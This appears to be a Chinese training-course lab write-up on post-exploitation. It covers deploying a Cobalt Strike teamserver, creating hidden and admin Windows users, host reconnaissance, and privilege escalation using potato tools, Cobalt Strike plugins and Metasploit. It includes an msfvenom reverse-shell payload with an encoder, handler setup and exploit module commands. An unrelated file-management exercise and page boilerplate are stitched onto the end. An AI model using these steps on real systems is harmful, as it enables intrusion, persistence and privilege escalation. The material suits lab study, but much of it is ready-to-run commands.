实训作业day09

一、安装CS

  • 压缩包解压后,将Server文件夹传给云服务器(我使用的是xftp)。命令如下:

    #mkdir -p /root/cs4.8
    #Server传输给云服务器
    #cd /root/cs4.8/Server
    

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • 给teamserver和TeamServerImage添加执行权限。

    #chmod +x teamserver
    #chmod +x TeamServerImage
    

    在这里插入图片描述

  • 执行命令“./teamserver 47.108.222.178 123456”(./teamserver IP 密码)启动cs服务端。

    在这里插入图片描述

  • 双击安装目录下的Cobalt_Strike_CN.vbs,输入Host和Password,点击“Connect”等待连接成功。

    在这里插入图片描述在这里插入图片描述

  • 点击“Cobalt Strike”,选择“脚本服务器”,点击“Load”,在plugin目录中找到后缀为na的插件文件添加(需要欧拉、梼杌、谢公子、巨龙拉东4个插件)。

    在这里插入图片描述
    在这里插入图片描述

二、用户组和用户、windows信息搜集命令

2.1 Windows用户组和用户命令

功能命令
新增用户net user zs pass /add
删除用户net user zs /del
新增隐藏用户net user zs$ pass /add
新增用户组net localgroup worker /add
删除用户组net localgroup worker /del
添加用户到用户组net localgroup worker zs /add
从用户组中删除用户net localgroup worker zs /del
将普通用户添加到管理员用户(提权)net localgroup administrator zs /add

2.2 windows信息搜集命令

命令信息
systeminfo打印系统信息
whoami获得当前用户名
whoami /priv当前帐户权限
ipconfig网络配置信息
ipconfig /displaydns显示DNS缓存
route print打印出路由表
arp -a打印arp表
hostname主机名
net user列出用户
net user UserName关于用户的信息
net localgroup列出所有组
net localgroup GROUP关于指定组的信息
tasklist /svc列出服务任务
net start列出启动的服务

三、手工提权思路和土豆提权

3.1 手工提权

  • 补丁筛选

    • 在目标主机上执行systeminfo,打印系统信息输出信息到本机。
    • 把系统信息文件放到 解压后的wesng-master 中。
    • 在本机执行以下命令。
    • python wes.py systeminfo.txt --color -i "Elevation of Privilege’”
    • 根据找到的漏洞编号去找能够使用的脚本。
  • EXP获取

    • 下面的项目都包含了大量漏洞脚本,根据编号找到后在可读写目录运行。

      https://github.com/Ascotbe/Kernelhub
      http://kernelhub.ascotbe.com/Windows/Docs/#/
      https://github.com/SecWiki/windows-kernel-exploits
      https://github.com/nomi-sec/PoC-in-GitHub
      https://gitlab.com/exploit-database/exploitdb
      

3.2 土豆提权

  • Winserver2012 R2配置IIS。

    • 打开服务器管理器,点击添加⻆⾊和功能。
      在这里插入图片描述

    • 一直选择”下一步“,到”服务器选择“时勾选web服务器(IIS)—>点击添加功能—>单击下⼀步。
      在这里插入图片描述
      在这里插入图片描述

    • 一直选择”下一步“,到”安装”后等待安装完毕后关闭。
      在这里插入图片描述
      在这里插入图片描述

  • 将下载的PrintNotifyPotato-NET46.exe传给winserver2012,打开cmd执行命令“PrintNotifyPotato-NET46.exe whoami”成功提权。
    在这里插入图片描述

四、CS插件提权

  • 开启CS客户端。
    在这里插入图片描述

  • 双击安装目录下的Cobalt_Strike_CN.vbs,输入Host和Password,点击“Connect”等待连接成功。
    在这里插入图片描述

  • 设置listener,注意端口不要冲突。
    在这里插入图片描述

  • 在“有效载荷”生成木马。
    在这里插入图片描述
    在这里插入图片描述

  • 选择存储路径。
    在这里插入图片描述

  • 传输到winserver2012,并双击木马。
    在这里插入图片描述

  • 设置“回连间隔”。
    在这里插入图片描述

  • 选择“会话交互”打开命令行,使用梼杌中的“SweetPotato”进行提权。
    在这里插入图片描述
    在这里插入图片描述

  • 输入“shell whoami”看到已经提权为system。
    在这里插入图片描述

五、MSF提权

  • 安装msf(kali内置nsf,此步骤跳过)。

    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
    

    在这里插入图片描述

  • 设置靶机防火墙,确保主机和靶机能ping通。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • 启动msf,生成木马,将木马文件设置最大读写权限。

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
    

    在这里插入图片描述

  • 把msf.exe传给靶机后,重启msf终端。
    在这里插入图片描述

  • 监听木马。

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 0.0.0.0		--所有网关的某个端口都监听.
    set lport 8888
    show option
    run	--进行监听
    

    在这里插入图片描述

  • Winserver2012双击msf.exe,成功监听。
    在这里插入图片描述

  • 使用“getuid”查看用户和权限。
    在这里插入图片描述

  • 使⽤提权模块(找补丁)。

    use post/windows/gather/enum_patches #设置提权模块(找补丁)
    options #查看参数
    set session 2 #设置编号
    run #开始收集
    

    在这里插入图片描述
    在这里插入图片描述

  • 由于没有找到补丁,后续步骤无法进行,所以缺少实验截图。

  • 找漏洞。

    use post/multi/recon/local_exploit_suggester #设置提权模块
    options #设置参数
    set session 2 #设置会话编号
     run #开始检测
    
  • 选择Check Result为“The target appears to be vulnerable.”的漏洞进行提权(假设存在exploit/windows/local/ms16_075_reflection_juicy)。

    use exploit/windows/local/ms16_075_reflection_juicy
    options
    set session 3
    set lport 6666
    run
    
  • 返回端口。

    use exploit/multi/handler
    set payload windows/meterpreter/reverse tcp
    set lport 6666
    set lhost nip
    run
    getuid
    
1.在当前文件夹下新建文件夹USER1;在当前文件夹的A文件夹下新建文件夹USER2。 2.将当前文件夹下的“AFILE.DOC”文件复制到当前文件夹下的B文件夹中;将当前文件夹下的B文件夹中的“BFILE.DOC”文件分别复制到当前文件夹和当前文件夹下的A文件夹中。 3.删除当前文件夹下的C文件夹;删除当前文件夹的A文件夹中的CCC文件夹。 4.将当前文件夹下的“OLE1.DOC”文件改名为“NEW1.DOC”;将当前文件夹下的A文件夹中 帮助: 1.打开当前文件夹(即:双击FileTest文件夹图标),然后单击鼠标右键,在弹出的快捷菜单中选择“新建”“文件夹”,再将文件夹“重命名”为USER1;同样方法,打开当前文件夹的A文件夹,然后单击鼠标右键,在弹出的快捷菜单中选择“新建”“文件夹”,再将文件夹“重命名”为USER2。 2.打开当前文件夹,用鼠标右键单击“AFILE.DOC”文件,在弹出的快捷菜单中选择“复制”,再打开当前文件夹下的B文件夹,然后单击鼠标右键,在弹出的快捷菜单中选择“粘贴”;同样方法,打开当前文件夹下的B文件夹,用鼠标右键单击“BFILE.DOC”文件,在弹出的快捷菜单中选择“复制”,再打开当前文件夹,然后单击鼠标右键,在弹出的快捷菜单中选择“粘贴”,再打开当前文件夹下的A文件夹,然后单击鼠标右键,在弹出的快捷菜单中选择“粘贴”。 3.打开当前文件夹,用鼠标右键单击C文件夹,在弹出的快捷菜单中选择“删除”;同样方法,打开当前文件夹下的A文件夹,用鼠标右键单击CCC文件夹,在弹出的快捷菜单中选择“删除”。 4.打开当前文件夹,用鼠标右键单击“OLE1.DOC”文件,在弹出的快捷菜单中选择“重命名”,然后将“OLE1.DOC”直接改名为“NEW1.DOC”即可;同样方法,打开当前文件夹下的A文件夹,用鼠标右键单击“OLE2.DOC”文件,在弹出的快捷菜单中选择“重命名”,然后将“OLE2.DOC”直接改名为“NEW2.DOC”即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值